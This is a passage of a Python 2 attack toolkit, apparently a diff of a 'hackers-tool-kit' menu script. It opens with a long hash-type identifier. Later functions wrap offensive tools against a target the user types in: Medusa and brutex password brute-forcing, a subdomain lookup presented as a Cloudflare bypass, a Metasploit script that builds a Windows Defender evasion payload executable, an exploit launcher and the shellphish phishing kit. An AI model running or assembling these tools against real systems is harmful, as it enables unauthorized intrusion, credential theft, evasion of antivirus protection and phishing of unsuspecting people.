hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] +#------------------# +#FIND HASH TYPE END# + + +#RESTART SCRIPT START# +#--------------------# +def restart(): + os.system("clear") + os.system("cd /root/hackers-tool-kit && python htk.py") +#------------------# +#RESTART SCRIPT END# + + +#MEDUSA AUTOMATED START# +#----------------------# +def medusa(): + k = raw_input("Target Host: ") + u = raw_input("User: ") + p = raw_input("Wordlist: ") + os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") + print "\n" + m = raw_input("Module: ") + n = raw_input("Port: ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) +#--------------------# +#MEDUSA AUTOMATED END# + + +#WAF DETECTER START# +#------------------# +def wafwoof(): + j = raw_input("Enter Target: ") + k = 'wafw00f {0}'.format(j) + os.system(k) +#----------------# +#WAF DETECTER END# + + +#CLOUDFLARE BYPASS START# +#-----------------------# +def cloud(): + + subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] + + print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") + + host = raw_input("Enter Target: ") + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(host) + showip = socket.gethostbyname(str(hosts)) + print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) + except: + pass + + print ( '\033[93m' + "Credit Goes To: tugrulbey.com") + print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") +#---------------------# +#CLOUDFLARE BYPASS END# + + +#BRUTEFORCE ALL SERVICES ON WEB START# +#------------------------------------# +def brutex(): + k = raw_input("Target: ") + p = raw_input("Port: ") + a = 'brutex {0} {1}'.format(k,p) + os.system(a) +#----------------------------------# +#BRUTEFORCE ALL SERVICES ON WEB END# + + +#METERPRETER HELP MENU START# +#---------------------------# +def methelp(): + os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") +#-------------------------# +#METERPRETER HELP MENU END# + + +#WINDOWS DEFENDER BYPASS START# +#-----------------------------# +def winbyp(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + pay = raw_input("Payload: ") + port = raw_input("Port: ") + name = raw_input("File Name: ") + os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') + os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) + os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') + os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) + os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) + os.system('echo "run\n" >> winbyp.rc') + os.system("service postgresql restart") + os.system('msfconsole -r winbyp.rc') + os.system('rm -rf winbyp.rc') +#---------------------------# +#WINDOWS DEFENDER BYPASS END# + + +#USE A EXPLOIT START# +#-------------------# +def exploit(): + os.system("cat /root/hackers-tool-kit/tools/exploits.txt") + print "\n" + f = raw_input("Select Exploit: ") + os.system('echo "use {0}\n" >> exploit.rc'.format(f)) + os.system('echo "show options\n" >> exploit.rc'.format(f)) + os.system("service postgresql restart") + os.system('msfconsole -r exploit.rc') + os.system('rm -rf exploit.rc') +#-----------------# +#USE A EXPLOIT END# + + +#PHISHING AUTOMATED START# +#------------------------# +def phish(): + os.system("bash /root/shellphish/shellphish.sh") +#----------------------# +#PHISHING AUTOMATED END# + + +#LIST DATABASE INFO START# +#------------------------# +def datalist(): + os.system('echo "hosts\n" >> data.rc') + os.system('echo "services\n" >> data.rc') + os.system("service postgresql restart") + os.system('msfconsole -r data.rc') + os.system('rm -rf 